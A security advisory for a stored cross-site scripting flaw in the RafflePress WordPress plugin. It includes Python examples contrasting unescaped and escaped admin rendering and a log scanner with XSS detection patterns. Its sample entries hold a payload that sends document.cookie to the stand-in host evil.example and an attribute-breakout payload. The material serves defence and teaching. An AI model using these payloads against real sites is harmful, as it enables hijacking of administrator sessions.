CVE-2025-12484
Giveaways · Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers
Executive summary
A high-severity vulnerability exists in the "Giveaways and Contests by RafflePress" WordPress plugin, allowing attackers to inject malicious code into the website. This code is then stored on the server and executed in the browsers of other users, including administrators, which could lead to website takeover, data theft, or redirection to malicious sites. Organizations using this plugin are at significant risk of compromise and should apply updates immediately.
Vulnerability
The vulnerability is a Stored Cross-Site Scripting (XSS) flaw. An unauthenticated attacker can submit malicious JavaScript in the social media username fields of a public giveaway or contest form created by the plugin. Because the plugin does not properly sanitize this user-supplied input before storing it, and does not escape it when it is later displayed, the payload is saved verbatim in the database. When a privileged user, such as an administrator, views the contest entries or related data in the WordPress dashboard, the stored script executes in that user's browser with the user's session, allowing the attacker to perform actions as the administrator, steal session cookies, or inject further malicious content. The security-relevant point is the trust-boundary crossing: input accepted from anyone on the public form is rendered, unescaped, inside an authenticated admin page.
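The flow above, modelled as an added example rather than the plugin's own code: a submission is stored, then rendered into an admin table row, once with no escaping (the flaw) and once escaped per output context (the fix). The field name "twitter", the sample entries and the payloads are constructed for illustration; the example also shows why an input-side tag-stripping filter is not a fix on its own, since an attribute-breakout payload contains no tag at all.

```python
import html
import re
from urllib.parse import quote

# Constructed giveaway entries modelling the social-username fields the
# advisory describes. The field name "twitter" is an assumption, not the
# plugin's real field name.
SAMPLE_ENTRIES = [
    {"email": "alice@example.com", "twitter": "alice_tweets"},
    # Classic stored payload: exfiltrates the viewer's cookies when rendered.
    {"email": "mallory@example.com",
     "twitter": "<script>fetch('//evil.example/?c='+document.cookie)</script>"},
    # Attribute-breakout payload: contains no tag, so tag stripping leaves it intact.
    {"email": "mallory2@example.com",
     "twitter": '" autofocus onfocus="alert(document.domain)'},
]

TAG_RE = re.compile(r"<[^>]*>")


def strip_tags(value):
    """Input-side 'sanitizer' that only removes tags. Shown below to be insufficient."""
    return TAG_RE.sub("", value)


def store_entry(entry, sanitizer=lambda v: v):
    """Model of saving a submission; the plugin's flaw is storing it unsanitized."""
    return {k: sanitizer(v) for k, v in entry.items()}


def render_row_vulnerable(entry):
    """Dashboard row built from stored values with no output escaping."""
    h = entry["twitter"]
    return (f'<tr><td>{entry["email"]}</td>'
            f'<td><a href="https://twitter.com/{h}" title="{h}">{h}</a></td></tr>')


def render_row_hardened(entry):
    """Escape every value for the context it lands in, at output time.

    In WordPress PHP the equivalents are esc_html() for element text,
    esc_attr() for attribute values and rawurlencode()/esc_url() for the
    URL path segment. html.escape() escapes quotes by default.
    """
    email = html.escape(entry["email"])
    h_attr = html.escape(entry["twitter"])                 # inside a quoted attribute
    h_text = html.escape(entry["twitter"])                 # as element text
    h_path = html.escape(quote(entry["twitter"], safe=""))  # URL-encode, then attribute-escape
    return (f"<tr><td>{email}</td>"
            f'<td><a href="https://twitter.com/{h_path}" title="{h_attr}">{h_text}</a></td></tr>')


def has_active_content(fragment):
    """Crude check for the example: is a live script tag or inline event handler present?"""
    return ("<script" in fragment.lower()
            or re.search(r'\son[a-z]+="', fragment, re.I) is not None)


if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print("vulnerable:", has_active_content(render_row_vulnerable(entry)))
        print("tag-strip: ", has_active_content(render_row_vulnerable(store_entry(entry, strip_tags))))
        print("hardened:  ", has_active_content(render_row_hardened(entry)))
```

Tag stripping neutralises the first payload but not the second, because `" autofocus onfocus="...` breaks out of the `title` attribute without ever containing a tag. Escaping at the point of output, for the specific context (text, attribute, URL), neutralises both; that is the property a patch for this class of bug must provide.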
Business impact
This vulnerability is rated as High severity with a CVSS score of 7.2. Successful exploitation could have a significant business impact, including the complete compromise of the website's administrative account. This could lead to website defacement, theft of sensitive customer data (such as email lists and personal information collected by the plugin), reputational damage, and loss of customer trust. Furthermore, a compromised website can be used to host phishing campaigns or distribute malware, potentially leading to blacklisting by search engines and security vendors.
Remediation
Immediate Action: Update the "Giveaways and Contests by RafflePress" plugin to the latest version, which contains a patch for this vulnerability. If the plugin is no longer required for business operations, deactivate and uninstall it completely to reduce the website's attack surface. Patching stops new injections; entries submitted before the update may still contain payloads, so review existing contest entries (and any lists exported from them) for script or event-handler content.
Proactive Monitoring: Monitor web server access logs for suspicious POST requests to pages associated with the RafflePress plugin, specifically looking for payloads containing HTML script tags or inline event-handler attributes (e.g., <script>, onerror=, onload=) in parameters related to social media usernames. Note that default access logs record only the request line, not the POST body, so body-level inspection requires a WAF or audit log (such as mod_security's) that captures request bodies; check decoded values, since payloads are commonly URL-encoded or double-encoded. Regularly review the website's front-end and back-end for any unauthorized or unusual code injections.
Compensating Controls: If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with rules designed to detect and block common XSS attack patterns. A properly configured WAF can filter malicious input before it reaches the application, providing a layer of defense against this type of attack. Treat this as a stopgap rather than a fix: signature-based rules can be bypassed by encoding and obfuscation, and they do nothing about payloads already stored in the database.
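The log check described under Proactive Monitoring, and the same pattern set a WAF rule would match on, as an added example that is not part of the original advisory. It parses combined-format access-log lines, percent-decodes parameter values repeatedly so double-encoded payloads are not missed, and flags script tags, inline event handlers and javascript: URLs in username-like parameters. The log lines, IP addresses, paths and parameter names are constructed for the example; the `body` argument exists for the case where a WAF or audit log supplies the POST body, which plain access logs do not.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache/nginx "combined" access-log lines for the example; IPs,
# paths and parameter names are invented and do not come from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Nov/2025:10:21:07 +0000] "POST /giveaway/?twitter=alice_tweets HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Nov/2025:10:22:41 +0000] "POST /giveaway/?twitter=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512 "-" "curl/8.4.0"
203.0.113.9 - - [12/Nov/2025:10:23:02 +0000] "POST /giveaway/?instagram=%2522%2520onerror%253Dalert(1) HTTP/1.1" 200 512 "-" "curl/8.4.0"
198.51.100.7 - - [12/Nov/2025:10:24:10 +0000] "GET /wp-admin/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names that carry social-media handles. Assumed for illustration;
# match them against the real form field names on your site.
USERNAME_PARAMS = re.compile(
    r"(twitter|facebook|instagram|youtube|tiktok|pinterest|username|handle)", re.I)

# Payload shapes the advisory says to look for: script-like tags, inline
# event handlers (onerror=, onload=, ...) and javascript: URLs.
XSS_RE = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe|object|embed|body)\b"
    r"|\bon[a-z]+\s*="
    r"|javascript\s*:",
    re.I,
)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads do not slip past."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_request(method, target, body=""):
    """Return (param, decoded value, matched pattern) for suspicious username params.

    `body` is optional: plain access logs do not record POST bodies, so it is
    only available when a WAF or mod_security audit log supplies it.
    """
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if body:
        params += parse_qsl(body, keep_blank_values=True)
    hits = []
    for name, value in params:
        if not USERNAME_PARAMS.search(name):
            continue
        decoded = fully_decode(value)
        m = XSS_RE.search(decoded)
        if m:
            hits.append((name, decoded, m.group(0)))
    return hits


def scan_log(lines):
    """Scan combined-format log text; return one finding dict per suspicious parameter."""
    findings = []
    for line in lines.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, decoded, pattern in scan_request(m["method"], m["target"]):
            findings.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                             "param": name, "value": decoded, "pattern": pattern})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['method']} {f['param']}={f['value']!r} matched {f['pattern']!r}")
```

The third sample line is the case a naive `grep '<script'` misses: the value arrives as `%2522%2520onerror%253D...`, which the web server decodes once to `%22%20onerror%3D...` and which only reveals `" onerror=` on a second decode. The same decode-before-match discipline applies to any WAF rule written for this issue.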
Exploitation status
Public Exploit Available: false
Analyst recommendation
Given the high severity (CVSS 7.2) of this vulnerability and its potential for full website compromise, we strongly recommend that all organizations using the "Giveaways and Contests by RafflePress" plugin prioritize applying the security update immediately. Although this CVE is not currently listed in the CISA KEV catalog and no public exploit is known, the form is reachable without authentication and the payload fires in an administrator's session, so the risk of data theft and reputational damage is substantial. A proactive patching strategy is the most effective way to mitigate this threat.